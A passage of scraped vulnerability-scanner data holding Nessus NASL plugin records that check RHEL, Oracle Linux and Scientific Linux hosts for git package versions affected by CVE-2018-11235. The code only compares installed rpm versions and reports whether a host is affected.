\"git-all-1.8.3.1-14.el7_5\",\n \"git-bzr-1.8.3.1-14.el7_5\",\n \"git-cvs-1.8.3.1-14.el7_5\",\n \"git-daemon-1.8.3.1-14.el7_5\",\n \"git-debuginfo-1.8.3.1-14.el7_5\",\n \"git-email-1.8.3.1-14.el7_5\",\n \"git-gui-1.8.3.1-14.el7_5\",\n \"git-hg-1.8.3.1-14.el7_5\",\n \"git-p4-1.8.3.1-14.el7_5\",\n \"git-svn-1.8.3.1-14.el7_5\",\n \"gitk-1.8.3.1-14.el7_5\",\n \"gitweb-1.8.3.1-14.el7_5\",\n \"perl-Git-1.8.3.1-14.el7_5\",\n \"perl-Git-SVN-1.8.3.1-14.el7_5\"\n ]\n};\npkg_list = pkgs[release];\n\nforeach (pkg in pkg_list)\n if (rpm_check(release:\"ZTE \" + release, reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"git\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:00", "description": "An update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-21T00:00:00", "type": "nessus", "title": "RHEL 7 : git (RHSA-2018:1957)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-10-24T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:emacs-git", "p-cpe:/a:redhat:enterprise_linux:emacs-git-el", "p-cpe:/a:redhat:enterprise_linux:git", "p-cpe:/a:redhat:enterprise_linux:git-all", "p-cpe:/a:redhat:enterprise_linux:git-bzr", "p-cpe:/a:redhat:enterprise_linux:git-cvs", "p-cpe:/a:redhat:enterprise_linux:git-daemon", "p-cpe:/a:redhat:enterprise_linux:git-debuginfo", "p-cpe:/a:redhat:enterprise_linux:git-email", "p-cpe:/a:redhat:enterprise_linux:git-gui", "p-cpe:/a:redhat:enterprise_linux:git-hg", "p-cpe:/a:redhat:enterprise_linux:git-p4", "p-cpe:/a:redhat:enterprise_linux:git-svn", "p-cpe:/a:redhat:enterprise_linux:gitk", "p-cpe:/a:redhat:enterprise_linux:gitweb", "p-cpe:/a:redhat:enterprise_linux:perl-Git", "p-cpe:/a:redhat:enterprise_linux:perl-Git-SVN", "cpe:/o:redhat:enterprise_linux:7", "cpe:/o:redhat:enterprise_linux:7.5", "cpe:/o:redhat:enterprise_linux:7.6", "cpe:/o:redhat:enterprise_linux:7.7"], "id": "REDHAT-RHSA-2018-1957.NASL", "href": "https://www.tenable.com/plugins/nessus/110632", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2018:1957. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110632);\n script_version(\"1.10\");\n script_cvs_date(\"Date: 2019/10/24 15:35:45\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"RHSA\", value:\"2018:1957\");\n\n script_name(english:\"RHEL 7 : git (RHSA-2018:1957)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git\nrepository is an exact copy with complete revision history. This not\nonly allows the user to work on and contribute to projects without the\nneed to have permission to push the changes to their official\nrepositories, but also makes it possible for the user to work with no\nnetwork connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious\nrepository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2018:1957\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2018-11235\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2018:1957\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"emacs-git-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"emacs-git-el-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-all-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-bzr-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-cvs-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-daemon-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-debuginfo-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-debuginfo-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-email-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-gui-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-hg-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"git-p4-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"git-svn-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"gitk-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"gitweb-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"perl-Git-1.8.3.1-14.el7_5\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"perl-Git-SVN-1.8.3.1-14.el7_5\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n }\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T13:16:39", "description": "From Red Hat Security Advisory 2018:1957 :\n\nAn update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized architecture. As opposed to centralized version control systems with a client-server model, Git ensures that each working copy of a Git repository is an exact copy with complete revision history. This not only allows the user to work on and contribute to projects without the need to have permission to push the changes to their official repositories, but also makes it possible for the user to work with no network connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a CVSS score, and other related information, refer to the CVE page(s) listed in the References section.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-21T00:00:00", "type": "nessus", "title": "Oracle Linux 7 : git (ELSA-2018-1957)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2019-09-27T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:emacs-git", "p-cpe:/a:oracle:linux:emacs-git-el", "p-cpe:/a:oracle:linux:git", "p-cpe:/a:oracle:linux:git-all", "p-cpe:/a:oracle:linux:git-bzr", "p-cpe:/a:oracle:linux:git-cvs", "p-cpe:/a:oracle:linux:git-daemon", "p-cpe:/a:oracle:linux:git-email", "p-cpe:/a:oracle:linux:git-gui", "p-cpe:/a:oracle:linux:git-hg", "p-cpe:/a:oracle:linux:git-p4", "p-cpe:/a:oracle:linux:git-svn", "p-cpe:/a:oracle:linux:gitk", "p-cpe:/a:oracle:linux:gitweb", "p-cpe:/a:oracle:linux:perl-Git", "p-cpe:/a:oracle:linux:perl-Git-SVN", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2018-1957.NASL", "href": "https://www.tenable.com/plugins/nessus/110629", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2018:1957 and \n# Oracle Linux Security Advisory ELSA-2018-1957 respectively.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110629);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/09/27 13:00:38\");\n\n script_cve_id(\"CVE-2018-11235\");\n script_xref(name:\"RHSA\", value:\"2018:1957\");\n\n script_name(english:\"Oracle Linux 7 : git (ELSA-2018-1957)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Oracle Linux host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"From Red Hat Security Advisory 2018:1957 :\n\nAn update for git is now available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having a security\nimpact of Important. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available for each\nvulnerability from the CVE link(s) in the References section.\n\nGit is a distributed revision control system with a decentralized\narchitecture. As opposed to centralized version control systems with a\nclient-server model, Git ensures that each working copy of a Git\nrepository is an exact copy with complete revision history. This not\nonly allows the user to work on and contribute to projects without the\nneed to have permission to push the changes to their official\nrepositories, but also makes it possible for the user to work with no\nnetwork connection.\n\nSecurity Fix(es) :\n\n* git: arbitrary code execution when recursively cloning a malicious\nrepository (CVE-2018-11235)\n\nFor more details about the security issue(s), including the impact, a\nCVSS score, and other related information, refer to the CVE page(s)\nlisted in the References section.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://oss.oracle.com/pipermail/el-errata/2018-June/007796.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected git packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/21\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"emacs-git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"emacs-git-el-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-all-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-bzr-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-cvs-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-daemon-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-email-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-gui-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-hg-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-p4-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"git-svn-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"gitk-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"gitweb-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perl-Git-1.8.3.1-14.el7_5\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"perl-Git-SVN-1.8.3.1-14.el7_5\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:03", "description": "Security Fix(es) :\n\n - git: arbitrary code execution when recursively cloning a malicious repository (CVE-2018-11235)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-22T00:00:00", "type": "nessus", "title": "Scientific Linux Security Update : git on SL7.x x86_64 (20180620)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235"], "modified": "2020-02-24T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:emacs-git", "p-cpe:/a:fermilab:scientific_linux:emacs-git-el", "p-cpe:/a:fermilab:scientific_linux:git", "p-cpe:/a:fermilab:scientific_linux:git-all", "p-cpe:/a:fermilab:scientific_linux:git-bzr", "p-cpe:/a:fermilab:scientific_linux:git-cvs", "p-cpe:/a:fermilab:scientific_linux:git-daemon", "p-cpe:/a:fermilab:scientific_linux:git-debuginfo", "p-cpe:/a:fermilab:scientific_linux:git-email", "p-cpe:/a:fermilab:scientific_linux:git-gui", "p-cpe:/a:fermilab:scientific_linux:git-hg", "p-cpe:/a:fermilab:scientific_linux:git-p4", "p-cpe:/a:fermilab:scientific_linux:git-svn", "p-cpe:/a:fermilab:scientific_linux:gitk", "p-cpe:/a:fermilab:scientific_linux:gitweb", "p-cpe:/a:fermilab:scientific_linux:perl-Git", "p-cpe:/a:fermilab:scientific_linux:perl-Git-SVN", "x-cpe:/o:fermilab:scientific_linux"], "id": "SL_20180620_GIT_ON_SL7_X.NASL", "href": "https://www.tenable.com/plugins/nessus/110655", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110655);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/02/24\");\n\n script_cve_id(\"CVE-2018-11235\");\n\n script_name(english:\"Scientific Linux Security Update : git on SL7.x x86_64 (20180620)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Security Fix(es) :\n\n - git: arbitrary code execution when recursively cloning a\n malicious repository (CVE-2018-11235)\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1806&L=scientific-linux-errata&F=&S=&P=4272\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?30778cae\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 